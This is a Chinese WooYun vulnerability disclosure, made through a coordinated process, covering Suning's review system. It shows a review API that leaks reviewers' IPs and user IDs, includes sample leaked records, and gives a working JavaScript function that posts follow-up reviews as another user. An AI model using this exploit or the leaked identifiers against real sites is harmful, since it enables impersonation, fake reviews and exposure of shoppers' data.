当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108987

漏洞标题:苏宁易购2处平行权限+1个用户信息泄露(可刷虚假评价)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 路人甲

提交时间:2015-04-19 13:03

修复时间:2015-06-03 16:14

公开时间:2015-06-03 16:14

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-19: 厂商已经确认,细节仅向厂商公开
2015-04-29: 细节向核心白帽子及相关领域专家公开
2015-05-09: 细节向普通白帽子公开
2015-05-19: 细节向实习白帽子公开
2015-06-03: 细节向公众公开

简要描述:

苏宁第三方的商品千万不敢给差评了...

详细说明:

获取商品评论信息接口是
http://zone.suning.com/review/json/product_reviews/000000000126148820--total-g-810999---3-4-getItem.html?callback=getItem
此接口返回的数据格式化后如下

{
  "success": true,
  "data": {
    "reviews": [
      {
        "id": 55615884,
        "content": "速度快,东西好",
        "contentLength": 7,
        "replyCount": 0,
        "usefulVoteCount": 0,
        "publishIp": "223.104.4.103",
        "publishTime": "2015-04-04 18:32:30",
        "publishDeviceId": 5,
        "anonymousFlag": 1,
        "userId": "6098337491",
        "user": {
          "province": "",
          "birthday": "",
          "constellation": "",
          "id": "6098337491",
          "nickName": "1***8",
          "gender": "",
          "typeId": "1",
          "imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
          "levelId": "161000000010",
          "levelName": "普通会员"
        },
        "status": 0,
        "score": 5,
        "bestFlag": false,
        "storeFlag": false,
        "storeId": "SN_001",
        "store": {
          "id": "SN_001",
          "name": "苏宁自营"
        },
        "againReviewFlag": false,
        "showOrderFlag": false,
        "productId": "000000000126148820",
        "product": {
          "name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
          "oldId": "25474860",
          "brandId": "00005G950",
          "brandName": "亚马逊(amazon)",
          "imageCount": 0,
          "firstCategoryId": "157122",
          "secondCategoryId": "258003",
          "thirdCategoryId": "258006",
          "purchaseCategory": "10051",
          "id": "000000000126148820"
        },
        "replyList": [],
        "labels": [],
        "orderItemId": 10082295095,
        "supplierName": "苏宁自营",
        "orderTime": "2015-04-03 15:58:13",
        "logonId": "139*****18"
      },
      {
        "id": 55611420,
        "content": "这个还可以",
        "contentLength": 5,
        "replyCount": 0,
        "usefulVoteCount": 0,
        "publishIp": "61.148.242.67",
        "publishTime": "2015-04-04 15:49:14",
        "publishDeviceId": 2,
        "anonymousFlag": 0,
        "userId": "6013127526",
        "user": {
          "province": "",
          "birthday": "",
          "constellation": "",
          "id": "6013127526",
          "nickName": "186*****37",
          "gender": "",
          "typeId": "1",
          "imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
          "levelId": "161000000010",
          "levelName": "普通会员"
        },
        "status": 0,
        "score": 5,
        "bestFlag": false,
        "storeFlag": false,
        "store": {
          "id": "SN_001",
          "name": "苏宁自营"
        },
        "againReviewFlag": false,
        "showOrderFlag": false,
        "productId": "000000000126148820",
        "product": {
          "name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
          "oldId": "25474860",
          "brandId": "00005G950",
          "brandName": "亚马逊(amazon)",
          "imageCount": 0,
          "firstCategoryId": "157122",
          "secondCategoryId": "258003",
          "thirdCategoryId": "258006",
          "purchaseCategory": "10051",
          "id": "000000000126148820"
        },
        "replyList": [],
        "labels": [],
        "orderItemId": 99999999999999,
        "logonId": "186*****37"
      },
      {
        "id": 55425631,
        "title": "",
        "content": "外观精致,体验很舒服。",
        "contentLength": 11,
        "replyCount": 0,
        "usefulVoteCount": 0,
        "publishIp": "171.111.40.70",
        "publishTime": "2015-04-02 01:12:07",
        "publishDeviceId": 1,
        "anonymousFlag": 0,
        "userId": "5202247450",
        "user": {
          "province": "",
          "birthday": "",
          "constellation": "",
          "id": "5202247450",
          "nickName": "139*****22",
          "gender": "",
          "typeId": "1",
          "imageUrl": "http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg",
          "levelId": "161000000010",
          "levelName": "普通会员"
        },
        "status": 0,
        "score": 5,
        "bestFlag": false,
        "storeFlag": false,
        "storeId": "SN_001",
        "store": {
          "id": "SN_001",
          "name": "苏宁自营"
        },
        "againReviewFlag": false,
        "showOrderFlag": false,
        "productId": "000000000126148820",
        "product": {
          "name": "亚马逊Kindle voyage 6英寸高级电子书阅读器 标准版 墨水屏 黑色",
          "oldId": "25474860",
          "brandId": "00005G950",
          "brandName": "亚马逊(amazon)",
          "imageCount": 0,
          "firstCategoryId": "157122",
          "secondCategoryId": "258003",
          "thirdCategoryId": "258006",
          "purchaseCategory": "10051",
          "id": "000000000126148820"
        },
        "replyList": [],
        "labels": [
          {
            "id": "14127037",
            "name": "待机长",
            "uniqueId": "216",
            "reviewId": "55425631",
            "status": 1
          }
        ],
        "orderItemId": 4075900887,
        "supplierName": "苏宁自营",
        "orderTime": "2015-03-12 00:42:55",
        "logonId": "139*****22"
      }
    ],
    "attributes": {
      "productId": "000000000126148820",
      "nineProductId": "126148820",
      "color": "",
      "version": "",
      "colorList": [],
      "versionList": []
    }
  }
}


其中data['reviews'][0]['id'] 是此条评论的id,data['reviews'][0]['content']是评论内容data['reviews'][0]['publishIp']是评论者IP,data['reviews'][0]['userId']是评论者的UID
此接口泄露用户的IP和UID
使用UID在http://zone.suning.com/me/review/6098337491.htm 处可以进入该用户的主页,如果该用户有未匿名的评价/晒单会显示出来。
接下来是平行权限了
http://zone.suning.com/me/self-review/6098337491-1.htm
此接口是用户在进入自己主页时调用的,显示自己所有的评价商品,但是没做权限验证,可以直接查看他人的所有评价商品。还可以“追加评价”哟
在登录任意账号状态下,调用如下函数即可以其他用户的身份追评【pid是评论id,uid是其他用户的id,ct是评价内容】

function append(pid, uid, ct) {
    var aurl = "http://zone.suning.com/me/ajax/appendReview.htm";
    $.ajax({
        url: aurl,
        type: "POST",
        dataType: 'jsonp',
        async: false,
        data: {
            content: ct,
            reviewId: pid,
            cmfUserId: uid
        },
        success: {
            function (data) {
                if (data.returnCode == 0) {
                    alert('success');
                    return;
                } else if (data.returnCode == 2) {
                    alert('黑名单用户');
                    return;
                } else if (data.returnCode == 1) {
                    alert('河蟹');
                    return;
                } else if (data.returnCode == -2) {
                    alert('异常');
                    return;
                }
            }
        }
    });
}


我试了给http://product.suning.com/126148820.html 评价第三页第二个用户追评,在评价页看不到追评内容,但是在用户自己视角下【http://zone.suning.com/me/self-review/6085490581-1.htm】是可以看到追评内容的

漏洞证明:

泄露用户UID和IP就不截图证明了。
这个是越权查看uid为6098337491用户所有评论商品的截图[当然,由于该用户只买了kindle,所以截图只有一件商品]

s.png


这个是越权在uid为6085490581用户评论里追加评论的截图

z.png

修复方案:

1.在商品评论接口去掉IP字段,以防差评后商家跨省
2.在商品评论接口对匿名评价用户去掉uid字段
3.对用户查看自己所有评价的页面验证用户权限
4.对追加评论,修改匿名状态等接口进行权限验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-19 16:12

厂商回复:

感谢提交,周一转交应用部门处理。

最新状态:

2015-05-27:稍后送上苏宁易购1000元礼品卡。

2015-06-08:请路人甲站内留下联系方式,以便发放礼品卡,谢谢。